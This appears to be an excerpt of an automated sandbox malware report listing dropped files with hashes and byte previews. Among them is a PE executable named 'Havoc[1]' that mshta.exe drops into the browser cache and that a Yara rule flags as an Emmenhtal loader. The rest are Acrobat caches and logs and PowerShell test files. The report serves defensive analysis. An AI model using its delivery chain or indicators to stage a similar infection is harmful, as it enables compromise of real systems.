                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d5e883ac1f266aa3c4cfa2e8429dbfc0","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1735637896000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"d65623998d7c42b4e7e5c88d0d709886","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1735637896000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"77bd876a2b2fb11427513fc080809949","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1735637896000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"8f99e9d5ca93d6d0601e3530ce6791fe","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1735637896000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"ae6ccd2cc992dce7bcd7a6c2f6b6b365","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1735637896000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"16ef439b78790cdf75fb809f6dd7d835","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                          Category:dropped
                                          Size (bytes):12288
                                          Entropy (8bit):1.1457970209247803
                                          Encrypted:false
                                          SSDEEP:24:TLhx/XYKQvGJF7urs2ERZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcm:TFl2GL7ms2GXc+XcGNFlRYIX2v3kdI
                                          MD5:FD1C87FC0B195E21C33AC47320CEDEDA
                                          SHA1:2207CC81B7B953FFA9A6DA9F14453EE2D538FEE5
                                          SHA-256:1B0654EA83EBE6CCCF5A09E03E131934D45158A884DEF9AE78B348DD7FEA71DA
                                          SHA-512:E6C236AECE516510BF61DF6B0B0902476C9CA4403D24F0EE65118EEC30F32A6FF165DE9D6CDC7C49369A8408A7034172CD87D0D5BEFF0D0B8421A006281E98FA
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:SQLite Rollback Journal
                                          Category:dropped
                                          Size (bytes):8720
                                          Entropy (8bit):1.5504597494249244
                                          Encrypted:false
                                          SSDEEP:24:7+tZEUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxhqLxx/XYKj:7MZJXc+XcGNFlRYIX2vEqVl2GL7msb
                                          MD5:0E56133F26C57E2D095FB353126E2076
                                          SHA1:1CACCEC570055AE6203810BB535F4A4CD8AA6E02
                                          SHA-256:B31F6B9910660ABB1ADAFEF941D45A8E2C6D1C517BCE51114E6DC47E5E66CC3B
                                          SHA-512:CAD5158776E1686F59A39603EEC461D9629AB4B66849BEC64077F364616B8D6C2BDAB7A8D3945A12AAF073A9C4E8EA4058D4C23D18B6545A806A0079B4B3EB57
                                          Malicious:false
                                          Preview:.... .c...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):66726
                                          Entropy (8bit):5.392739213842091
                                          Encrypted:false
                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgJ8TpQnP9rPnjU5LKBb7/PuLPeYyu:6a6TZ44ADEJapQnP9rPo5HTeK
                                          MD5:EB185C42D1B3275F8164AC641A335A01
                                          SHA1:188438699697B69568FA6A077112FD841A991431
                                          SHA-256:5E66BF40335B820FAB824E8CF4E681524DC46853E6D2A65B344EC9F2229FA90D
                                          SHA-512:B330723F526BEB3773CB5AF21BF54B281C2FA84E66A7149C175A5D61F403B951E7E82D6DC1860715FACFBFC46AE75DC939033FD5B9071F49EB79CC82AEF61C82
                                          Malicious:false
                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1]

                                          Download File
                                          Process:C:\Windows\System32\mshta.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):462035
                                          Entropy (8bit):6.337495476941588
                                          Encrypted:false
                                          SSDEEP:6144:1+WoC/IdkUP25u+WoC/IdkUP253+WoC/IdkUP25B+WoC/IdkUP25I+WoC/IdkUPS:1pOk6pOkTpOkNpOk0pOk
                                          MD5:D394A49CC05730256F3DDC7E8084DC60
                                          SHA1:3CAE5669F89B2223384C22AFFBEEEEF16C410249
                                          SHA-256:AB2BDA4E7DC25A1EDC5EAF2D60045FF7CB732A924FF13336644027CD7966CD16
                                          SHA-512:BD9F568D7A9090D10C88CF63DE8D1E3AFCFE102E3274BD35EE9134274A5810713559535E0F984EA3EDBD90EAB0CA0F8D93C80BA90F792310C494993142FB3F96
                                          Malicious:false
                                          Yara Hits:
                                          • Rule: emmenhtal_strings_hta_exe, Description: Emmenhtal Loader string, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1], Author: Sekoia.io
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...C...3...C...3...C...3...C...3...3...2...C...3...Cw..3...C...3..Rich.3..........................PE..L...........................T....................@.......................................@...... ..........................P$..,....`..(....................p.......1..T............................................ ..L.......@....................text...X........................... ..`.data...............................@....idata..D)... ...*..................@..@.didat.......P.......4..............@....rsrc...(....`.......6..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):0.34726597513537405
                                          Encrypted:false
                                          SSDEEP:3:Nlll:Nll
                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                          Malicious:false
                                          Preview:@...e...........................................................

                                          C:\Users\user\AppData\Local\Temp\MSI1886f.LOG

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):246
                                          Entropy (8bit):3.5193370621730837
                                          Encrypted:false
                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8fQDiNUlI:Qw946cPbiOxDlbYnuRKuFUG
                                          MD5:B27B6D0E7EAA50B474571ADF150EE5C3
                                          SHA1:D4F8A54A3BD8E9B43730D72537312F269BB83E0E
                                          SHA-256:A20F2DEA9960DFE613ECB2F731994EF469C48CB66FB2064D9ACCF106E17F0907
                                          SHA-512:4457EB8F9A23241D9CFA4138FAAA9A65AB8737B42A078A879D1C9C1163EE93D94243F3501A5755E0BD8CB5C2ABFEA098F535542971B6EC295880110C0DC5CF7F
                                          Malicious:false
                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .3.1./.1.2./.2.0.2.4. . .0.4.:.3.8.:.1.7. .=.=.=.....

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12di3lvx.dcl.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3p0u3uke.l22.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fmptp2cj.43u.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1ni4u3u.rn0.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5nutwlw.oaj.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrdmhpgv.rwk.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-31 04-38-10-403.log

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:ASCII text, with very long lines (393)
                                          Category:dropped
                                          Size (bytes):16525
                                          Entropy (8bit):5.338264912747007
                                          Encrypted:false
                                          SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                          MD5:128A51060103D95314048C2F32A15C66
                                          SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                          SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                          SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                          Malicious:false
                                          Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:

                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):15114
                                          Entropy (8bit):5.367494606109248
                                          Encrypted:false
                                          SSDEEP:384:96O3WqbGvnY5Q+7MipNCM+rb8neyrLbcVq2y4wgA22Gd3n3DqNXJQ/Q5Iqg3UpRQ:WVt
                                          MD5:6339D312F59DFE1F35EBA9A287927E30
                                          SHA1:D8FA17257C3C1564B9F0B83AEF0771ADC485D27B
                                          SHA-256:648FD7E54F60B2A1066230B9E8EBC48517620AE449D740174964D375B26D5FB2
                                          SHA-512:E5F830B839FBAB148DFE1214611BE803F68E170569E80387A03E7D238E857C86C99535F3D03DFBED81767CD70991921328E471720A33CB24EC46D8D398B9D7CE
                                          Malicious:false
                                          Preview:SessionID=f55f2035-cf09-4df0-9c6c-158b05416a14.1735637890413 Timestamp=2024-12-31T04:38:10:413-0500 ThreadID=7880 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=f55f2035-cf09-4df0-9c6c-158b05416a14.1735637890413 Timestamp=2024-12-31T04:38:10:414-0500 ThreadID=7880 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=f55f2035-cf09-4df0-9c6c-158b05416a14.1735637890413 Timestamp=2024-12-31T04:38:10:414-0500 ThreadID=7880 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=f55f2035-cf09-4df0-9c6c-158b05416a14.1735637890413 Timestamp=2024-12-31T04:38:10:414-0500 ThreadID=7880 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=f55f2035-cf09-4df0-9c6c-158b05416a14.1735637890413 Timestamp=2024-12-31T04:38:10:414-0500 ThreadID=7880 Component=ngl-lib_NglAppLib Description="SetConf

                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):29752
                                          Entropy (8bit):5.398391593102086
                                          Encrypted:false
                                          SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcb8cb+zIWkcbp:V3fOCIdJDeSEWr
                                          MD5:3ABFAA23311C8A5029ACC9C6826319A3
                                          SHA1:6A368A3836DEBF172FBE418091D21F2ABCB4471F
                                          SHA-256:D56F369D13DC42ABFCBEDE048A31698F22553B4C796D866E7A4637FFA81BD0FC
                                          SHA-512:329A365D32E94C29257B553B2F433628810048D73627DF76026BA0FB88BF931ED998E7F2E564A59E3A2682E106C5E60D5F1ABB0DC31377B2B1F9C2A363FB2FDC
                                          Malicious:false
                                          Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-

                                          C:\Users\user\AppData\Local\Temp\acrocef_low\5eea6e12-ed60-445d-beee-8a5d19c33ebb.tmp

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                          Category:dropped
                                          Size (bytes):1419751
                                          Entropy (8bit):7.976496077007677
                                          Encrypted:false
                                          SSDEEP:24576:uoD9WL07oXGZflYIGNPZdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:uy9WLxXGZNZGH3mlind9i4ufFXpAXkru
                                          MD5:130BE2FD618BFD72EFAE881EB827AE8F
                                          SHA1:943042DBAF8A8E2F70A79F41F6B0C76880D62803
                                          SHA-256:647467C57EE2B583A18E9946EA78CEC9265634A35F8A5E584097818DAA596004
                                          SHA-512:4741A8FC7E59C5260EA1AF15C3C82FA95625FE3CB1025F311C859B4F9732A126826C4E2FFDAACB7CF72CE15DD901AAC4F2152DACDF7AABAD07CA4A901DDEE9BC
                                          Malicious:false
                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                          C:\Users\user\AppData\Local\Temp\acrocef_low\6285d9b6-adef-4118-9d97-dd668d2ff1da.tmp

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                          Category:dropped
                                          Size (bytes):386528
                                          Entropy (8bit):7.9736851559892425
                                          Encrypted:false
                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                          Malicious:false
                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                          C:\Users\user\AppData\Local\Temp\acrocef_low\69a72795-0b5e-45bb-8142-eaa89c84eed2.tmp

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 634912
                                          Category:dropped
                                          Size (bytes):1407294
                                          Entropy (8bit):7.97605879016224
                                          Encrypted:false
                                          SSDEEP:24576:/ndpy6mlind9j2kvhsfFXpAXDgrFBU2/R07EGZf5ZwYIGNPzWL07oW:P3mlind9i4ufFXpAXkrfUs0wGZxZwZGf
                                          MD5:03FDCEEC7CEFA155EC3C965BE538D89B
                                          SHA1:FCFDFA1B002CB5E4C0A3D06EA11D5747721FDA0A
                                          SHA-256:BCEBA5BD63F4508C59CB1A8859663954A4070C93F4435A56B0CD2564A15D639D
                                          SHA-512:38F2254704A8D6F7E34ED64525A195E5E2210D91A680C2DDCFB40820C32F89FFABDF71BA8CB7FC2000342EA4E663991C92984718A3CAA22F565402B94F054152
                                          Malicious:false
                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                          C:\Users\user\AppData\Local\Temp\acrocef_low\d763f227-dd5a-476d-a54f-bccae5d353d0.tmp

                                          Download File
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                          Category:dropped
                                          Size (bytes):758601
                                          Entropy (8bit):7.98639316555857
                                          Encrypted:false
                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                          MD5:3A49135134665364308390AC398006F1
                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                          Malicious:false
